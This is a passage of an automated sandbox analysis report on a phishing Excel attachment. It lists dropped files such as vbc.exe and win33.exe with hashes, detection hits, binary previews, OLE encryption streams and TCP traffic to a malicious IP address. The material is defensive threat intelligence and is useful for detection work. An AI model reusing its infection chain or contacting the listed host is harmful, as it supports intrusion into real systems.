                                                                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):84203
                                                                  Entropy (8bit):7.979766688932294
                                                                  Encrypted:false
                                                                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EF6436D2.emf
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                  Category:dropped
                                                                  Size (bytes):7608
                                                                  Entropy (8bit):5.091127811854214
                                                                  Encrypted:false
                                                                  SSDEEP:96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
                                                                  MD5:EB06F07412A815AED391F20298C1087B
                                                                  SHA1:AC0601FFC173F50B56C3AE2265C61B76711FBE01
                                                                  SHA-256:5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
                                                                  SHA-512:38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
                                                                  Malicious:false
                                                                  Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I....................................................v.Ze..............%f^..................Y...Y.'.wq....\.....Y.......Y.@.Y.W.wq......Y..6.v_.wq......wq.Ze.4.g^..Y...f^0.g^......g^..f^........4.g^@.Y...f^......f^..........g^..Y.......g^4tf^..g^............<..u.Z.v.....Ze......Ze........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD088ACD.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):49744
                                                                  Entropy (8bit):7.99056926749243
                                                                  Encrypted:true
                                                                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFD606D5.emf
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                  Category:dropped
                                                                  Size (bytes):648132
                                                                  Entropy (8bit):2.8124530118203914
                                                                  Encrypted:false
                                                                  SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                                                                  MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                                                                  SHA1:F677467423105ACF39B76CB366F08152527052B3
                                                                  SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
                                                                  SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                                                                  Malicious:false
                                                                  Preview: ....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                  C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                  Process:C:\Users\Public\vbc.exe
                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64672
                                                                  Entropy (8bit):6.033474133573561
                                                                  Encrypted:false
                                                                  SSDEEP:768:PedoViadPL1DI9WzutSjeJan8dBhF541kE6Iq8HaVxlYDKz4yqibwEBbr:XiaFJkobMa8dBXG2zbVUDKz4yq3EBbr
                                                                  MD5:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                  SHA1:017801B7EBD2CC0E1151EEBEC14630DBAEE48229
                                                                  SHA-256:5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
                                                                  SHA-512:9670AC5A10719FA312336B790EAD713D78A9999DB236AD0841A32CD689559B9F5F8469E3AF93400F1BE5BAF2B3723574F16EA554C2AAF638734FFF806F18DB2B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: Purchase Order Price List.xlsx, Detection: malicious, Browse
                                                                  • Filename: Quote QU038097.doc, Detection: malicious, Browse
                                                                  • Filename: 6Cprm97UTl.xls, Detection: malicious, Browse
                                                                  • Filename: Payment_Confirmation_Slip.xlsx, Detection: malicious, Browse
                                                                  • Filename: Overdue Invoice.xlsx, Detection: malicious, Browse
                                                                  • Filename: Quotation.xlsx, Detection: malicious, Browse
                                                                  • Filename: ENCLOSE ORDER LIST.xlsx, Detection: malicious, Browse
                                                                  • Filename: PO INV 195167 & 195324.xlsx, Detection: malicious, Browse
                                                                  • Filename: Bank letter.xlsx, Detection: malicious, Browse
                                                                  • Filename: Quotation.xlsx, Detection: malicious, Browse
                                                                  • Filename: PO 19030004.xlsx, Detection: malicious, Browse
                                                                  • Filename: New PO PO20.xlsx, Detection: malicious, Browse
                                                                  • Filename: ORDER LIST.xlsx, Detection: malicious, Browse
                                                                  • Filename: RFQ 00112.xlsx, Detection: malicious, Browse
                                                                  • Filename: inquiry.xlsx, Detection: malicious, Browse
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.W..............0.................. ........@.. ....................... ......k.....`.....................................O.......8................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B........................H........A..`p...........................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.;...}S......i.>...}T......i.>...}U.....+m...(....o......r]..p.o ...,..{T.......{U........o!....+(.ra..p.o ...,..{T.......
                                                                  C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                                                  Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                  File Type:ISO-8859 text
                                                                  Category:dropped
                                                                  Size (bytes):8
                                                                  Entropy (8bit):3.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:FA3n:M
                                                                  MD5:2EBE3955A49AD21463B3FA81325FAE9D
                                                                  SHA1:8A70B8494E579301B9E4D998EAC9D93A9044452D
                                                                  SHA-256:79075C30BBDB1408DC286CCBF49F38E510D17811D15416B833B74829978D6579
                                                                  SHA-512:121C86EE0C3459C7311EA014E68077C2C5B610B9FBA8078FA142FD9BB95A5A6E7AAF33650EC4366A74592D6BA20B877550E48A712503E8A4B6B0717F1EFC8AEA
                                                                  Malicious:true
                                                                  Preview: .m%.X+.H
                                                                  C:\Users\user\AppData\Roaming\win33.exe
                                                                  Process:C:\Users\Public\vbc.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):734208
                                                                  Entropy (8bit):7.833756558737052
                                                                  Encrypted:false
                                                                  SSDEEP:12288:iRqIue16rc2fV5hZcK1KjkiZCx7jsFuR6Y/ctiBHkcpZtoMZ:AqIue1kff/ECKwiZCx34mcC9LtoMZ
                                                                  MD5:EB43B3C033BD76B51B90A51A6726A81C
                                                                  SHA1:0D39FFCF64ED4F38EA83A72D726D40881F583014
                                                                  SHA-256:4E9A5CC90F1D17550208942E0182E9A99598C18C19B3467C184A46F4214755E2
                                                                  SHA-512:7EFB598153F2C4760FE17F7EF6510F5A48482027434B303A93439BD4C472C3D4E676E3BB8AED268277696F834DC93EA8853481D94C5FACAF61BECF4A23C17A8C
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Roaming\win33.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 30%
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................(...........G... ...`....@.. ....................................@.................................PG..K....`..`............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...`....`.......*..............@..@.reloc...............2..............@..B.................G......H........S.. ;..............2............................................0.......... ........8........E....}...).......I.......8x...(....8....8t... ....~....9....&8.....:4... ....~a...:....& ....8....8/... ....~{...:....&8....(.... ....~*...9p...&8f....:....8....*8....8.......*....(....*..(0...*&~.......*...~....*..0..t........(.... ....~!...:....& ....8....8........E.... .......8....*8.... ....~q...:....&8.......9....&&8....8....}....8....~...9....8....&{....8....&8....*~...
                                                                  C:\Users\user\Desktop\~$Ref 0180066743.xlsx
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):330
                                                                  Entropy (8bit):1.4377382811115937
                                                                  Encrypted:false
                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                  Malicious:true
                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  C:\Users\Public\vbc.exe
                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):734208
                                                                  Entropy (8bit):7.833756558737052
                                                                  Encrypted:false
                                                                  SSDEEP:12288:iRqIue16rc2fV5hZcK1KjkiZCx7jsFuR6Y/ctiBHkcpZtoMZ:AqIue1kff/ECKwiZCx34mcC9LtoMZ
                                                                  MD5:EB43B3C033BD76B51B90A51A6726A81C
                                                                  SHA1:0D39FFCF64ED4F38EA83A72D726D40881F583014
                                                                  SHA-256:4E9A5CC90F1D17550208942E0182E9A99598C18C19B3467C184A46F4214755E2
                                                                  SHA-512:7EFB598153F2C4760FE17F7EF6510F5A48482027434B303A93439BD4C472C3D4E676E3BB8AED268277696F834DC93EA8853481D94C5FACAF61BECF4A23C17A8C
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 30%
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................(...........G... ...`....@.. ....................................@.................................PG..K....`..`............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...`....`.......*..............@..@.reloc...............2..............@..B.................G......H........S.. ;..............2............................................0.......... ........8........E....}...).......I.......8x...(....8....8t... ....~....9....&8.....:4... ....~a...:....& ....8....8/... ....~{...:....&8....(.... ....~*...9p...&8f....:....8....*8....8.......*....(....*..(0...*&~.......*...~....*..0..t........(.... ....~!...:....& ....8....8........E.... .......8....*8.... ....~q...:....&8.......9....&&8....8....}....8....~...9....8....&{....8....&8....*~...

                                                                  Static File Info

                                                                  General

                                                                  File type:CDFV2 Encrypted
                                                                  Entropy (8bit):7.995449899424773
                                                                  TrID:
                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                  File name:Ref 0180066743.xlsx
                                                                  File size:1250304
                                                                  MD5:dffc9e820070887fd0e4a4973e847a36
                                                                  SHA1:32c5185f4aa508cc60ad331e4b3046dce732135c
                                                                  SHA256:9d7b5114111ce6382d022e2e43344b2608db07ecbbf13da758dd220e8df90394
                                                                  SHA512:619c5af981e220ee0caf478bc931ff61608b97482beb5b688df8e4ffbb9045c196300db763f09be702fe65c0eb9a9c3591f6d61a1afc289236a658b7f67b1a20
                                                                  SSDEEP:24576:ePrkOTZ/gbYRYYQjrX/4k0msjwet+bybolCT6ntNMdVGPyB:Arx/gbYRY9X/4k0ms7+OGCsoa0
                                                                  File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                                                                  File Icon

                                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                                  Static OLE Info

                                                                  General

                                                                  Document Type:OLE
                                                                  Number of OLE Files:1

                                                                  OLE File "Ref 0180066743.xlsx"

                                                                  Indicators

                                                                  Has Summary Info:False
                                                                  Application Name:unknown
                                                                  Encrypted Document:True
                                                                  Contains Word Document Stream:False
                                                                  Contains Workbook/Book Stream:False
                                                                  Contains PowerPoint Document Stream:False
                                                                  Contains Visio Document Stream:False
                                                                  Contains ObjectPool Stream:
                                                                  Flash Objects Count:
                                                                  Contains VBA Macros:False

                                                                  Streams

                                                                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                  General
                                                                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                  File Type:data
                                                                  Stream Size:64
                                                                  Entropy:2.73637206947
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                  General
                                                                  Stream Path:\x6DataSpaces/DataSpaceMap
                                                                  File Type:data
                                                                  Stream Size:112
                                                                  Entropy:2.7597816111
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                  General
                                                                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                  File Type:data
                                                                  Stream Size:200
                                                                  Entropy:3.13335930328
                                                                  Base64 Encoded:False
                                                                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                  General
                                                                  Stream Path:\x6DataSpaces/Version
                                                                  File Type:data
                                                                  Stream Size:76
                                                                  Entropy:2.79079600998
                                                                  Base64 Encoded:False
                                                                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 1236152
                                                                  General
                                                                  Stream Path:EncryptedPackage
                                                                  File Type:data
                                                                  Stream Size:1236152
                                                                  Entropy:7.99983137636
                                                                  Base64 Encoded:True
                                                                  Data ASCII:. . . . . . . . ^ M { B = . 7 K . $ . . . . 8 . . * . . S . . . . a . . . . . . T . . . ^ . . % . . " s . . . . . . . o . . . . B . i . , . . * . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # } ` . 2 . . { . . . q . s . . # }
                                                                  Data Raw:ae dc 12 00 00 00 00 00 5e 4d 7b 42 3d 0f 37 4b 8b 24 aa 1e fb c0 38 07 99 2a 9b f9 53 c3 c5 99 0c 61 cc dc ad 00 d2 12 54 ae a8 a3 5e ff d1 25 cc cf 22 73 12 b9 06 e5 fb e6 da 6f 86 f2 e9 ca 42 a7 69 13 2c 18 e7 2a 1c 71 e7 73 9e 03 23 7d 60 d2 32 0f 84 7b a5 01 1c 71 e7 73 9e 03 23 7d 60 d2 32 0f 84 7b a5 01 1c 71 e7 73 9e 03 23 7d 60 d2 32 0f 84 7b a5 01 1c 71 e7 73 9e 03 23 7d
                                                                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                  General
                                                                  Stream Path:EncryptionInfo
                                                                  File Type:data
                                                                  Stream Size:224
                                                                  Entropy:4.56771105117
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . j . . . O . . . R W . . * . a . . . . 5 . . . . . > . . . . X 2 . . . . . . X ( . . . . m _ X O . u \\ . r . . . . . . . . . . : [ . . L
                                                                  Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jun 9, 2021 08:04:56.928414106 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.064789057 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.064953089 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.065510035 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205565929 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205605984 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205631018 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205636024 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205655098 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205658913 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205662012 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205681086 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205688953 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205704927 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205705881 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205732107 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205737114 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205756903 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205761909 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205785036 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205789089 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205809116 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.205815077 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.205838919 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.215353012 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342072964 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342111111 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342137098 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342159033 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342180014 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342197895 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342211008 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342216015 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342232943 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342250109 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342256069 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342259884 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342272997 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342283010 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342299938 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342303991 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342313051 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342325926 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342329979 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342348099 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342360020 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342369080 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342372894 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342390060 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342397928 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342412949 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342423916 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342437983 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342458010 CEST4916780192.168.2.22198.12.127.155
                                                                  Jun 9, 2021 08:04:57.342461109 CEST8049167198.12.127.155192.168.2.22
                                                                  Jun 9, 2021 08:04:57.342468023 CEST4916780192.168.2.22198.12.127.155
